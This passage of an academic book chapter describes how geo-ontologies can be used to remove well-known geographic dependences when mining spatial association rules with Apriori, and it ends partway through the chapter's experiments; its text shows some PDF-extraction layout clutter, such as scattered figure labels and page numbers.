Mount, D. W. (2004). Bioinformatics sequence and genome analysis. Cold Spring Harbor, New York: Cold Spring Harbor Laboratory Press. Narens, L. (1985). Abstract measurement theory. Cambridge, MA: MIT Press. Novak, G. S., Jr. (1995). Conversion of units of measurement. IEEE Transactions on Software Engineering, 21(8), 651-661. Noy, N. F., & Hafner, C. D. (1997). The state of the art in ontology sesign: A survey and comparative review. AI Magazine, 18(3), 53-74. Nozick, L. K., Turnquist, M. A., Jones, D. A., Davis, J. R., & Lawton, C. R. (2004). Assessing the Performance of Interdependent Infrastructures and Optimizing Investments. Paper presented at the 37th Annual Hawaii International Conference on System Sciences, Big Island, HI. Pease, A., & Niles, I. (2002). IEEE standard upper ontology: A progress report. Knowledge Engineering Review, 17, 65-70. Ram, S., & Wei, W. (2004). Modeling the semantics of 3D protein structures. Paper presented at the ER 2004, Shanghai, China. Reiger, C., & Grinberg, M. (1977). The declarative representation and procedural simulations of causality in physical mechanisms. Paper presented at the Joint Conference on Artificial Intelligence. Retz-Schmidt, G. (1988). Various views on spatial prepositions. AI Magazine, 9(2), 95-105. Roberts, F. (1979). Measurement theory with applications to decision making, utility and the social sciences. Reading, MA: Addison-Wesley. Ronco, L., Grossel, M., Zimmer, M., & Socash, T. (2003). Modules in emerging fields. Vol 4: Genomics and proteomics. SAP-AG. (1995). SAP R/3 system: Quality management (No. 4.6). Neurottstrasse 16, 69190 Walldorf, Germany: SAP AG. 2403
A Measurement Ontology Generalizable for Emerging Domain Applications on the Semantic Web
Scheaffer, R. L., & McClave, J. T. (1982). Statistics for engineers. Boston, MA: PWS Publishers.
functional genomics experiments. Comparative and Functional Genomics, 4(1), 127-132.
Schlenoff, C., Balakirsky, S., Uschold, M., Provine, R., & Smith, S. (2003). Using ontologies to aid navigation planning in autonomous vehicles. The knowledge engineering review, 18, 243-255.
Uschold, M., & Gruninger, M. (1996). Ontologies: Principles, methods and applications. Knowledge Engineering Review, 11(2), 93-136.
Stevens, R., Goble, C., Horrocks, I., & Bechhofer, S. (2002). Building a bioinformatics ontology using OIL. IEEE Transactions on Information Technology in Biomedicine, 6(2), 135-141. Stevens, R., Goble, C. A., & Bechhofer, S. (2000). Ontology-based knowledge representation for bioinformatics. Briefings in Bioinformatics, 1(4), 398-414. Stoeckert Jr., C. J., & Parkinson, H. (2004). The MGED ontology: A framework for describing
Wroe, C., Stevens, R., Goble, C., & Ashburner, M. (2003). A methodology to migrate the gene ontology to a description logic environment using DAML+OIL. Pacific Symposium on Biocomputing, 8, 624-635.
ENDNOTE 1
Facts or constants (as opposed to variables) expressed in competency questions are denoted in Greek letters within single quotes.
This work was previously published in the Journal of Database Management, Vol. 18, Issue 1, edited by K. Siau, pp. 20-42, copyright 2007 by IGI Publishing (an imprint of IGI Global).
2404
2405
Chapter 8.3
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies Vania Bogorny Universidade Federal do Rio Grande do Sul (UFRGS), Brazil, and Transnational University of Limburg, Belgium Paulo Martins Engel Universidade Federal do Rio Grande do Sul (UFRGS), Brazil Luis Otavio Alavares Universidade Federal do Rio Grande do Sul (UFRGS), Brazil
ABSTRACT This chapter introduces the problem of mining frequent geographic patterns and spatial association rules from geographic databases. In the geographic domain most discovered patterns are trivial, non-novel, and noninteresting, which simply represent natural geographic associations intrinsic to geographic data. A large amount of natural geographic associations are explicitly represented in geographic database schemas and geo-ontologies, which have not been used so far in frequent geographic pattern mining. Therefore, this chapter presents a novel approach to extract
patterns from geographic databases using geoontologies as prior knowledge. The main goal of this chapter is to show how the large amount of knowledge represented in geo-ontologies can be used to avoid the extraction of patterns that are previously known as noninteresting.
INTRODUCTION Knowledge discovery in databases (KDD) is the nontrivial process of identifying valid, novel, potentially useful and ultimately understandable patterns from data (Fayyad et al., 1996).
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
In frequent pattern mining (FPM), which is the essential role in mining associations, one of the main problems is the large amount of generated patterns and rules. In geographic databases this problem increases significantly because most discovered patterns include well-known natural associations intrinsic to geographic data. While in transactional databases items are supposed to be independent from each other (e.g.,, milk, cereal, bread), independently of their meaning, in geographic databases a large amount of data are semantically dependent (e.g., island within water). Geographic dependences are semantic constraints that must hold in geographic databases (GDB) to warrant the consistency of the data (e.g.,, island must be completely located inside a water body). They are part of the concept of geographic data and are explicitly represented in geo-ontologies. Without considering semantics of geographic data, the same geographic dependences explicitly represented in geo-ontologies and geographic database schemas are unnecessarily extracted by association rule mining algorithms and presented to the user. Geographic dependences produce two main problems in the process of mining spatial association rules: a.
b.
2406
Data preprocessing: A large computational time is required to preprocess GDB to extract spatial relationships (e.g., intersection between districts and water bodies). The spatial join (Cartesian product) operation, required to extract spatial relationships, is the most expensive operation in databases and the processing bottleneck of spatial data analysis and knowledge discovery. Frequent pattern and association rule generation: A large number of patterns and spatial association rules without novel, useful, and interesting knowledge is generated (e.g., is_a(Island) Æ within (Water)).
Aiming to improve geographic data preprocessing and eliminate well-known geographic dependences in geographic FPM in order to generate more interesting spatial association rules (SAR), this chapter presents a unified framework for FPM considering the semantics of geographic data, using geo-ontologies. While dozens of spatial and nonspatial FPM algorithms define syntactic constraints and different thresholds to reduce the number of patterns and association rules, we consider semantic knowledge constraints (Bogorny et al., 2005b), and eliminate the exact sets of geographic objects that produce well-known patterns (Bogorny et al., 2006b, 2006c). The main objective of this chapter is to show the important role that ontologies can play in the knowledge discovery process using the FPM technique. The focus addresses the use of semantic knowledge stored in ontologies to reduce uninteresting patterns, but not to create ontologies for data mining. The remainder of the chapter is organized as follows: Section 2 presents some background concepts about geographic data, spatial relationships, spatial integrity constraints, and geo-ontologies. Section 3 introduces the concepts of frequent patterns and spatial association rules, the problem generated by geographic dependences in both data preprocessing and spatial association rule mining, and what has been done so far to alleviate this problem. Section 4 presents a framework to improve geographic data preprocessing and spatial association rule mining using geo-ontologies. Experiments are presented to show the significant reduction in the number of frequent patterns and association rules. Section 5 presents future trends and Section 6 concludes the chapter.
BACKGROUND Geographic data are real world entities, also called spatial features, which have a location on Earth’s surface (Open GIS Consortium, 1999a).
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Spatial features (e.g., Brazil, Argentina) belong to a feature type (e.g., country), and have both nonspatial attributes (e.g., name, population) and spatial attributes (geographic coordinates x,y). The latter normally represent points, lines, polygons, or complex geometries. In geographic databases, every different feature type is normally stored in a different database relation, since most geographic databases follow the relational approach (Shekhar & Chawla, 2003). Figure 1 shows an example of how geographic data can be stored in relational databases. There is a different relation for every different geographic object type (Shekhar & Chawla, 2003) street, water resource, and gas station, which can also be called as spatial layers. The spatial attributes of geographic object types, represented by shape in Figure 1, have implicitly encoded spatial relationships (e.g., close, far, contains, intersects). Because of these relationships, real world entities can affect the behavior of other features in the neighborhood. This makes spatial relationships the main characteristic of geographic data to be considered for data mining, knowledge discovery (Ester et al., 2000; Lu et al., 1993), and the main character-
istic, which separates spatial data mining from nonspatial data mining. The process of extracting spatial relationships brings together many interesting and uninteresting spatial associations. Figure 2 shows an example where gas stations and industrial residues repositories may have any type of spatial relationship with water resources. Considering, for example, that water analysis showed high chemical pollution, the different spatial relationships among water resources, gas stations, and industrial residues repositories will be interesting for knowledge discovery. Notice in Figure 2 that there is NO standard pattern among the data. Figure 3 shows two examples of spatial relationships that represent well-known geographic domain dependences. In Figure 3 (left), viaducts intersect streets, and bridges intersect both water resources and streets, since both bridges and viaducts have the semantics of connecting streets. In Figure 3 (right), gas stations intersect streets because they do only exist in areas with streets access. The main difference between the examples shown in Figure 2 and Figure 3 is that in the former spatial relationships may hold or not, and
Figure 1. Example of geographic data storage in relational databases
2407
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Figure 2. Examples of implicit spatial relationships Industrial Residues Repositories Gas Stations Water Resources
Figure 3. Examples of spatial relationships that produce well known geographic patterns in spatial data mining Bridges and Viaducts Streets
Gas Station Street
Water Resources
may conduce to more interesting patterns. In the latter, under rare exceptions or some geographic location inconsistency, the spatial relationships hold for practical purposes in a 100% of the cases, and will produce well known geographic domain patterns in the discovery process. If considered in association rule mining, well known spatial relationships will generate high confidence rules such as is_a (Viaduct) Æ intersect (Street) (99%) or is_a (GasStation) Æ intersect (Street) (100%).
2408
Although users might be interested in high confidence rules, not all strong rules necessarily hold considerable information. Moreover, the mixed presentation of thousands of interesting and uninteresting rules can discourage users from interpreting them in order to find novel and unexpected knowledge (Appice et al., 2005). Patterns in the discovery process should be considered interesting when they represent unknown strong regularities, rare exceptions, or
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Figure 4. Spatial relationships (a) Distance
(c) Topological
(b) Direction/Order
A d3
A B
B north A D
B d2
d1
B
Equals
C
A
C C southeast A
B Crosses
when they help to distinguish different groups of data. In geographic databases, however, there are a large number of patterns intrinsic to the data, which represent strong regularities, but do not add novel and useful knowledge to the discovery. They are mandatory spatial relationships which represent spatial integrity constraints that must hold in order to warrant the consistency of geographic data.
Spatial Relationships and Spatial Integrity Constraints Spatial relationships can be classified as distance, direction, and topological. Distance relationships are based on the Euclidean distance between two spatial features, as shown in Figure 4(a). Direction relationships deal with the order as spatial features are located in space such as north, south, east, and so forth, as shown in Figure 4(b). Topological relationships describe concepts of adjacency, containment, and intersection between two spatial features, and remain invariant under topological transformations such as rotating and scaling. Figure 4(c) shows examples of topological relationships, which will be the focus in this chapter. Binary topological relationships are mutually exclusive, and there are many approaches in the literature to formally define a set of topological relationships among points, lines, and polygons
B
A B
A Touches
A
Contains/Within
A
B
Overlaps
(Clementini et al., 1993; Egenhofer & Franzosa, 1995). The Open GIS Consortium (OGC) (Open GIS Consortium, 2001), which is an organization dedicated to develop standards for spatial operations and spatial data interchange to provide interoperability between Geographic Information Systems (GIS), defines a standard set of topological operations: disjoint, overlaps, touches, contains, within, crosses, and equals. Topological relationships can be mandatory, prohibited, or possible. Mandatory and prohibited spatial relationships represent spatial integrity constraints (Cockcroft, 1997; Serviane et al., 2000), and their purpose is to warrant as well as maintain both the quality and the consistency of spatial features in geographic databases. Mandatory spatial integrity constraints are normally represented by cardinalities one-one and one-many in geographic data conceptual modeling (Bogorny & Lochpe, 2001; Serviane et al., 2000; Shekhar & Chawla, 2003) in order to warrant that every instance of a geographic feature type is spatially related to at least one instance of another spatial feature type (e.g., “island within water body”). In data mining, such constraints produce well-known patterns and high confidence rules because of the strong co-relation of the data. While mandatory relationships must hold, prohibited relationships should not (e.g., “road cannot contain river”).
2409
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Possible relationships, however, are usually not explicitly represented, since they can either exist or not (e.g., “roads cross water bodies,” “counties contain factories”). Possible relationships may produce more interesting patterns, and are therefore the most relevant to find novel and useful knowledge in spatial data mining. Mandatory constraints are well-known concepts to geographers and geographic database designers, and are normally explicitly represented in geographic database schemas (Bogorny et al., 2006b, 2006c) and geo-ontologies (Bogorny et al., 2005b).
Geo-Ontologies and Spatial Integrity Constraints Ontology is an explicit specification of a conceptualization (Gruber, 1993). More specifically ontology is a logic theory corresponding to the intentional meaning of a formal vocabulary, that is, an ontological commitment with a specific conceptualization of the world (Guarino, 1998). It is an agreement about the concepts meaning and structure for a specific domain. Each concept definition must be unique, clear, complete, and nonambiguous. The structure represents the properties of the concept, including a description, attributes, and relationships with other concepts. Ontologies have been used recently in many and different fields in computer science, such as artificial intelligence, databases, conceptual modeling, semantics Web, and so forth. Therefore, a relevant number of ontologies has been proposed, and a number of models, languages, and tools was developed. Chaves et al. (2005a), besides defining a geo-ontology for administrative data for the country of Portugal, defines a metamodel, named GKB (geographic knowledge base), which is a starting point to define an ontology for geographic data. In geo-ontologies, spatial integrity constraints are represented by properties of geographic data. They are specified as restriction properties given
2410
by a spatial relationship and both minimum and maximum cardinalities. For instance, a concept island, which is a piece of land surrounded by water, must have a mandatory one-one relationship with the concept water. Figure 5 shows a small example of a geographic ontology with the specification of different topological relationships, generated with Protégé, in order to illustrate how mandatory semantic constraints are represented. In the example in Figure 5, gas stations and bus stops must have a mandatory constraint with road because every gas station and every bus stop must topologically touch one or more instances of a road. Roads, however, do not necessarily have gas stations or bus stops, so their relationship is not represented. Cities must also contain at least one road, while roads have no mandatory relationship with city. Notice in the OWL representation that minimum cardinality 1 is explicitly represented and can be easily retrieved. To evaluate the amount of well-known dependences in real geo-ontologies we analyzed the first geo-ontology of Portugal, named geo-net-pt01 (Chaves et al., 2005b). Although not all elements of the geographic domain have been defined in geo-net-pt01, there are many one-one and onemany dependences. The repository of the geo-ontology stores three levels of information: geo-administrative, geophysical, and network. The geo-administrative level stores administrative information about territorial division, and includes geographic feature types such as municipalities, streets, and so forth. The network level stores nonspatial data and relationships about the geo-administrative layer (e.g., population of a district). The geo-physical level stores feature types including continents, oceans, lakes, bays, water bodies, and so forth. In geo-net-pt01, among 58 different spatial feature types, 55 one-one relationships were defined in the geo-administrative level. The following section introduces the problem of mining geographic data with well-known dependences.
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Figure 5. Geo-ontology representation and OWL code
THE PROBLEM OF GEOGRAPHIC DEPENDENCES IN SPATIAL ASSOCIATION RULE MINING In transactional data mining, every row in the dataset to be mined is usually a transaction and columns are items, while in spatial data mining, every row is an instance (e.g., Buenos Aires) of a reference object type (e.g., city), called target feature type, and columns are predicates. Every predicate is related to a nonspatial attribute (e.g., population) of the target feature type or a spatial predicate. Spatial predicate is a relevant feature type that is spatially related to specific instances of the target feature type (e.g., contains factory). Spatial predicates are extracted with operations provided by GIS, and can be represented at different granularity levels (Han & Fu, 1995; Lu,
et al. 1993), according to the objective of the discovery. For example, chemical factory, metallurgical factory, and textile factory could be used instead of factory. Spatial predicates are computed with spatial joins between all instances t of a target feature type T (e.g., city) and all instances o (e.g., Rio de la Plata) of every relevant feature type O (e.g., river) in a set of relevant feature types S (e.g., river, port, street, factory) that have any spatial relationship (e.g., touches, contains, close, far) with T. Being T a set of instances T={t1, t2,…,tn}, S = { O1, Oi,…, Om}, and Oi = { o1, o2,…, oq}, the extraction of spatial predicates implies the comparison of every instance of T with every instance of O, for all O ⊂ S. The spatial predicate computation is the first step for extracting association rules from geo-
2411
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
graphic databases. An association rule consists of an implication of the form X Æ Y, where X and Y are sets of items co-occurring in a given tuple (Agrawal, Imielinkski & Swami, 1993). Spatial association rules are defined in terms of spatial predicates, where at least one element in X or Y is a spatial predicate (Koperski, 1995). For example, is_a(Slum) ∧ far_ from(WaterNetwork) Æ disease=Hepatitis is a spatial association rule. We assume that F = {f1, f2, …,fk, ..., fn} is a set of nonspatial attributes (e.g., population) and spatial predicates (e.g., close_to(Water)) that characterize a reference feature type, and Ψ (dataset) is a set of instances of a reference feature type, where each instance is a row W such that W ⊆ F. There is exactly one tuple in the dataset to be mined for each instance of the reference feature type. The support s of a predicate set X is the percentage of tuples in which the predicate set X occurs as a subset. The support of the rule X → Y is given as s(X∪Y). The rule X → Y is valid in Ψ with confidence factor 0 ≤ c ≤ 1, if at least c% of the instances in Ψ that satisfy X also satisfy Y. The notation X → Y (c) specifies that the rule X → Y has confidence factor of c. More precisely, the confidence factor is given as s(X∪Y)/s(X). The general problem of mining spatial association rules can be decomposed in three main steps, where the first one is usually performed as a data preprocessing method: a.
b.
c.
2412
Extract spatial predicates: A spatial predicate is a spatial relationship (e.g., distance, order, topological) between the reference feature type and a set of relevant feature types. Find all frequent patterns/predicates: A set of predicates is a frequent pattern if its support is at least equal to a certain threshold, called minsup. Generate strong rules: A rule is strong if it reaches minimum support and the confi-
dence is at least equal to a certain threshold, called minconf. Assertion 1 (Agrawal & Srikant, 1994): if a predicate set Z is a frequent pattern, then every subset of Z will also be frequent. If the set Z is infrequent, then every set that contains Z is infrequent too. All rules derived from Z satisfy the support constraint if Z satisfies the support constraints. Well-known geographic dependences appear in the three steps of the spatial association rule mining process. In the first step (a) well-known geographic dependences may exist among T and any O ⊂ S. In the second (b) and third (c) steps, dependences exist among relevant feature types, that is, between pairs of O ⊂ S. In the following sections we describe the problem that such dependences generate in frequent geographic pattern mining and what has been done so far to reduce this problem.
Geographic Dependences Between the Target Feature Type and Relevant Feature Types In data preprocessing, time and effort are required from the data mining user to extract spatial relationships and transform geographic data in a single table or single file, which is the input format required by most data mining algorithms. Even in multirelational data mining where geographic data are transformed to first-order logic, the process of extracting spatial relationships is required. The problem of which spatial relationships should be considered for knowledge discovery has been addressed in earlier works. (Koperski & Han, 1995;Lu et al., 1993) presented a top-down progressive refinement method where spatial approximations are calculated in a first step, and in a second step, more precise spatial relationships are computed to the outcome of the first step. The method has been implemented in the module Geo-Associator of the GeoMiner system
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
(Han, Koperski & Stefanvic, 1997), which is no longer available. Ester et al., (2000) proposed new operations such as graphs and paths to compute spatial neighborhoods. However, these operations are not implemented by most GIS, and to compute all relationships between all objects in the database in order to obtain the graphs and paths is computationally expensive for real databases. Appice et al., (2005) proposed an upgrade of Geo-Associator to first-order logic, and all spatial relationships are extracted. This process is computationally expensive and nontrivial in real databases. While the above approaches consider different spatial relationships and any geometric object type, a few approaches such as (Huang, Shekhar & Xiong, 2004; Yoo & Shekhar, 2006) compute only distance relationships for point object types. Table 1 shows an example of a spatial dataset at a high granularity level, where every row is a city and predicates refer to different geographic object types (port, water body, hospital, street, and factory) spatially related to city. Let us consider two geographic dependences: city and street, and port and water body, where the former is between the target feature type and a relevant feature type
and the latter is among the two relevant feature types. In the dataset shown in Table 1, the dependence between the target feature type city and the relevant feature type street is explicit, because every city has at least one street and the predicate contains(Street) has a 100% support. Predicates with 100% support appear in at least half of the total number of patterns and generate a large number of noninteresting association rules. For example, a rule such as contains(factory) Æ contains(Street) expresses that cities that contain factories do also contain streets. Although such a rule seems to be interesting, it can be considered obvious due the simple fact that all cities contain streets, having they factories, or not. Table 2 shows the result of a small experiment performed with Apriori (Agrawal & Srikant, 1994) over the dataset in Table 1. Considering 20% minimum support, 31 frequent sets and 180 rules were generated. Among the 31 frequent sets and the 180 rules, 16 frequent sets and 130 rules had the dependence contains(Street). Notice that increasing minimum support to 50% does not warrant the elimination of the geographic dependence. Although the number of frequent
Table 1. Example of a preprocessed dataset in a high granularity level for mining frequent patterns and SAR
Table 2. Frequent patterns and rules with dependences
2413
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
sets is reduced to 25 and rules to 96, 13 frequent sets and 72 rules still have the dependence. Geographic dependences besides generating a large number of well-known patterns and association rules, require unnecessary spatial joins. To illustrate the power that semantics may have in spatial join computation, let us consider a few examples, shown in Table 3. Without considering semantics, all topological relationships between two spatial feature types would be tested in order to verify which one holds. Considering semantics, the number of relationships to test reduces significantly. As shown in Table 3, the only topological relationship semantically consistent between gas station and road should be touches. A city hall must be within a city, while a water body can be disjoint, touch, or cross a road. Although the topological relationships shown in Table 3 are semantically possible, not all of them are interesting for knowledge discovery. So, if besides considering the semantics of spatial features we also consider spatial integrity constraints, it is possible to reduce still further the number of topological relationships and define which should be computed for knowledge discovery. Remembering
that mandatory relationships produce well known patterns and that only possible relationships are interesting for knowledge discovery, Table 4 shows the topological relationships of the same objects in Table 3 that would be computed if semantics and integrity constraints were considered. The pairs gas station and road, bridge and water body, city hall and city, as well as treated water net and city have mandatory one-one or one-many constraints and no relationship is necessary for KDD. Despite mandatory and prohibited constraints do not explicitly define the interesting spatial relationships to be extracted for knowledge discovery, we are able to eliminate those which are either mandatory or prohibited, and specify those which are possible, as will be explained in Section 4.
Geographic Dependences Among Relevant Feature Types To find frequent predicate sets and extract strong association rules, predicates are combined with each other for the different instances of the target feature type T, and not among T and O as explained in the previous section.
Table 3. Possible and mandatory topological relationships considering semantics of feature types
Table 4. Possible topological relationships for knowledge discovery
2414
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
To illustrate the geographic dependence replication process in frequent geographic pattern mining, let us consider the frequent set generation introduced by (Agrawal & Srikant, 1994) for the Apriori algorithm. Apriori performs multiple passes over the dataset. In the first pass, the support of the individual elements is computed to determine k-predicate sets. In the subsequent passes, given k as the number of the current pass, the large sets Lk-1 in the previous pass (k -1) are grouped into sets Ck with k elements, which are called candidate sets. The support of each candidate set is computed, and if it is equal or higher than minimum support, then this set is considered frequent/large. This process continues until the number of large sets is zero. Geographic dependences appear the first time in frequent sets with 2 elements, where k=2. Table 5 shows the frequent sets extracted from the dataset in Table 1 with 50% minimum support, where k is the number of elements in the frequent sets. Notice that since the dependence has minimum support, that is, a frequent predicate set, this dependence is replicated to many frequent sets of size k>2 with predicates that reach minimum support, as shown in bold style in Table 5. Con-
sidering such a small example and high minimum support, one single geographic dependence participates in six frequent sets, which represents 30% of the frequent sets. Notice that the number of rules having a geographic dependence will be much larger than the frequent sets, mainly when the largest frequent set (with 4 elements) contains the dependence. In Table 5, we can observe that the technique of generating closed frequent sets (Paskier et al., 1999; Zaki & Hsiao, 2002) would not eliminate geographic dependences, because both sets with 4 elements that contain the dependence are closed frequent sets. The closed frequent set approach eliminates redundant frequent sets, but does not eliminate well known dependences if applied to the geographic domain. In order to evaluate the amount of well-known rules generated with the dependence, let us observe Table 6, which shows a few examples of association rules generated with frequent predicate sets of size 2 {Contains(Port),crosses(Water Body)}, size 3 {Contains(Port),contains(Hospital),cros ses(Water Body)}, and size 4 {Contains(Port), contains(Hospital), contains(Street),crosses( Water Body)}. Rules 1 and 2 are generated from
Table 5. Large predicate sets with 50% minimum support
2415
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Table 6. Examples of association rules with frequent sets of size 2, 3, and 4 having the geographic dependence
the set with two elements, and represent a single geographic dependence and its inverse. Rules 3, 4, 5, and 6 reproduce rules 1 and 2 with an additional element in the antecedent or the consequent of rule. The same happens with frequent sets that contain 4 elements. Rules 7, 8, and 9 are rules 1 and 2 with two additional elements that combined with the dependence reached minimum support. Approaches that reduce the number of rules and eliminate redundant rules (Zaki, 2000) do not warrant the elimination of all association rules that contain geographic dependences. Existing algorithms for mining frequent geographic patterns and generating strong spatial association rules do neither make use of semantic knowledge to specify which spatial relationships should be computed in data preprocessing, nor to reduce the number of well-known patterns. Koperski and Han (1995) reduces the number of rules using minimum support during the predicate generation. Clementini et al. (2000) presented a similar method for mining association rules from geographic objects with broad boundaries. Appice et al., (2005) reduces the number of rules with user specified pattern constraints, which require a lot of background knowledge from the data mining user. This method is inefficient since pattern constraints are applied in postprocessing steps, after both frequent sets and association rules have already been generated.
2416
Because of the dependence replication process in both frequent sets and association rules, shown in Table 5 and Table 6 respectively, it might be difficult for the data mining user to analyze all rules to discover if they are really interesting or not. To help the data mining user, in the following section we present a framework to remove all well known geographic dependences, warranting that no association rules with such dependences will be generated.
A FRAMEWORK FOR GEOGRAPHIC DATA PREPROCESSING AND SPATIAL ASSOCIATION RULE MINING WITH ONTOLOGIES Recently, in (Bogorny et al., 2005b, 2006a, 2006b, 2006c) we introduced the idea of using semantic knowledge for reducing spatial joins and well known patterns in SAR mining. In Bogorny et al., (2006a) we proposed to eliminate well-known patterns among the target feature type and relevant feature types with intelligent geographic data preprocessing. In data preprocessing, however, not all well-known dependences can be removed. Then, we presented a frequent pattern mining algorithm that uses semantic knowledge to eliminate dependences among relevant feature
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Figure 6. A framework for mining frequent geographic patterns using ontologies
Association Rule Mining Frequent Generation Pattern Mining
Frequent Pattern Mining with Semantic Constraints
Data Mining
Spatial Join Feature Selection
Dependence Elimination
OpenGIS Functions and Operations
Transformation
Knowledge Base Ontologies Ontologies
PostGIS
types during the frequent set generation (Bogorny et al., 2006b). In Bogorny et al. (2006c) we proposed an integrated framework, which eliminates geographic dependences completely in both data preprocessing and frequent pattern generation, using geographic database schemas as prior knowledge. This section presents an interoperable framework for geographic data preprocessing and spatial association rule mining using geographic ontologies. Ontologies are used not only to eliminate well known dependences, but to verify which spatial relationships should be computed in the spatial predicate computation. Figure 6 shows the framework that can be viewed in three levels: data repository, data preprocessing, and data mining. At the bottom are the geographic data repositories: the knowledge repository which stores geo-ontologies and geographic databases stored in GDBMS (geographic database management systems) constructed under OGC specifications. Following the OGC specifications (Open GIS Consortium, 1999b) makes our framework interoperable with all GDBMS constructed under OGC specifications (e.g., Oracle, PostGIS, MySQL, etc.).
Oracle
.....
Other OpenGIS based GDBMS
Data PreProcessing
Data and Knowledge Repository
At the center is the spatial data preparation level, which covers the gap between data mining tools and geographic databases. At this level, data and knowledge repositories are accessed through JDBC/ODBC connections and data are retrieved, preprocessed, and transformed into the single table format. At this level, dependences among the target feature and relevant features are removed, as described in the next section. On the top are the data mining toolkits or algorithms for mining frequent patterns and generating association rules. At this level, a new method for mining frequent geographic patterns is presented. Dependences among relevant feature types that can only be removed into the data mining algorithm are eliminated during the frequent set generation, as will be explained along with this section.
Data Preprocessing: Using Semantics to Eliminate Geographic Dependences Between the Target Feature Type and the Relevant Feature Types There are four main steps to implement the tasks of geographic data preprocessing for association
2417
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
rule mining: Feature Selection, Dependence Elimination, Spatial Join, and Transformation. The Feature Selection step retrieves all relevant information from the database such that the user can choose the target feature type T, the target feature nonspatial attributes and the set S of relevant feature types that may have some influence on T. The feature types as well as their geometric attributes are retrieved through the OpenGIS database schema metadata, stored in the relation geometry _columns (see Bogorny et al., 2005a) for details. The algorithm that implements the remaining data preprocessing steps is presented in Figure 7. The Dependence Elimination step searches the ontology φ and verifies the properties of T. If T has a mandatory dependence M with any O in S, then O is eliminated from the set S of relevant feature types. Notice that for each relevant feature type removed from the set S, no spatial
join is required to extract spatial relationships. By consequence, no spatial association rule will be generated with this relevant feature type. If a prohibited relationship P is defined between T and O in the ontology φ, then the set of possible relationships to compute for data mining is given by D(T,O) = R – P(T,O), where R is the set of all topological relationships R = {touches, contains, within, crosses, overlaps, equals, disjoint}. If there is no property of T in φ that relates T and O, then all relationships are computed. The Spatial Join step computes the spatial relationships D between T and all remaining O in S. Spatial joins D to extract spatial predicates are performed on-the-fly with operations provided by the GIS. The Transformation step transposes as well as discretizes the Spatial Join module output (Ψ) into the single table format understandable to association rule mining algorithms.
Figure 7. Pseudo-code of the data preprocessing algorithm
2418
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Frequent Pattern Generation: Using Semantics to Eliminate Geographic Dependences Among Relevant Features Frequent pattern and association rule mining algorithms, under rare exceptions (Han, Pei & Yin, 2000) generate candidates and frequent sets. The candidate generation in spatial data mining is not a problem because the number of predicates is much smaller than the number of items in transactional databases (Shekhar & Chawla, 2003). Moreover, the computational cost relies on the spatial join computation. Approaches that generate closed frequent sets do previously compute the frequent sets, and than verify if they are closed. Although they reduce the number of frequent sets, they do not warrant the elimination of well known geographic patterns. In SAR mining, it is more important to warrant that the results frequent sets are free of well-known dependences aiming to generate more interesting patterns, than to reduce the number of frequent sets. Apriori (Agrawal & Srikant, 1994) has been the basis for dozens of algorithms for mining spatial and nonspatial frequent sets, and association rules. We will illustrate the method of geographic dependence elimination during the
frequent set generation using Apriori, as shown in Figure 8. We propose to remove from the candidate sets all pairs of elements that have geographic dependences. As in Apriori, multiple passes are performed over the dataset. In the first pass, the support of the individual elements is computed to determine large-predicate sets. In the subsequent passes, given k as the number of the current pass, the large/frequent sets Lk-1 in the previous pass (k-1) are grouped into sets Ck with k elements, which are called candidate sets. Then the support of each candidate set is computed, and if it is equal or higher than minimum support, then this set is considered frequent. This process continues until the number of frequent sets is zero. Similarly to Srikant and Agrawal (1995), which eliminates in the second pass candidate sets that contain both parent and child specified in concept hierarchies, we eliminate all candidate sets which contain geographic dependences, but independently of any concept hierarchy. The dependences are eliminated in an efficient way, when generating candidates with 2 elements, and before checking their frequency. If the pairs of predicates (e.g., contains(Port), contains(Water Body)) contain feature types (e.g., Port, Water Body) that have a mandatory constraint in the
Figure 8. Frequent set generation function
2419
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
ontology φ, then all pairs of predicates with a dependence in φ are removed from C2. According to Assertion 1, this step warrants that the pairs of geographic objects that have a mandatory constraint in the ontology φ will neither appear together in the frequent sets, nor in the spatial association rules. This makes the method effective independently of other thresholds, and clearly improves in efficiency, since less frequent sets will be generated. The main strength of this method in our framework is its simplicity. This single, but very effective and efficient step, removes all well-known geographic dependences, and can be implemented by any algorithm that generates frequent sets. Considering the example of frequent sets shown in Table 5, the dependence is eliminated when it appears at the first time, such that no larger frequent sets or association rules with the dependence will be generated.
with different relevant feature types (e.g., bus routes—4062 multilines, slums—513 polygons, water resources—1030 multilines, gas stations 450 points) were preprocessed and mined, using ontologies and without using ontologies. Estimating the time reduction to compute spatial joins for mining frequent patterns is very difficult, since this step is completely data dependent. The computational time reduction to extract spatial joins depends on three main aspects: how many dependences (relevant feature types) are eliminated in data preprocessing; the geometry type of the relevant feature (point, line, or polygon); and the number of instances of the eliminated feature type (e.g., 60,000 rows). For example, if a relevant feature type with 57 580 polygons is eliminated, spatial join computation would significantly decrease. If the eliminated feature type has 3062 points, time reduction would be less significant. However, for every relevant feature type eliminated, no spatial join is necessary, and this warrants preprocessing time reduction. To evaluate the frequent pattern reduction by pruning the input space, Figure 9 describes an experiment performed with Apriori, where 2 dependences between the reference object type and the relevant feature types were eliminated. Notice that input space pruning reduces frequent patterns independently of minimum support. Considering
Experiments and Evaluation In order to evaluate the interoperability of the framework, experiments were performed with real geographic databases stored under Oracle 10g and PostGIS. Districts, a database table with 109 polygons and nonspatial attributes, such as population and sanitary condition, was defined as the target feature type T. Datasets
Figure 9. Frequent sets generated with input space pruning
